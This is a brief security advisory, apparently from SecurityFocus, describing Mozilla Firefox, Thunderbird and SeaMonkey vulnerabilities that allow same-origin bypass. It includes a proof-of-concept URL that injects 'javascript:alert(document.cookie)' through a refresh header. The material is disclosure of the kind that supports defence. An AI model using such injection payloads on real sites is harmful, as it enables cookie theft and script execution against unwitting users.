13 lines
No EOL
620 B
Text
13 lines
No EOL
620 B
Text
source: http://www.securityfocus.com/bid/34656/info
|
|
|
|
The Mozilla Foundation has released multiple security advisories specifying various vulnerabilities in Firefox, Thunderbird, and SeaMonkey.
|
|
|
|
Attackers can exploit these issues to bypass same-origin restrictions, obtain potentially sensitive information, and execute arbitrary script code with elevated privileges; other attacks are also possible.
|
|
|
|
With request to script at web site:
|
|
|
|
http://www.example.com/script.php?param=javascript:alert(document.cookie)
|
|
|
|
Which returns in answer the refresh header:
|
|
|
|
refresh: 0; URL=javascript:alert(document.cookie) |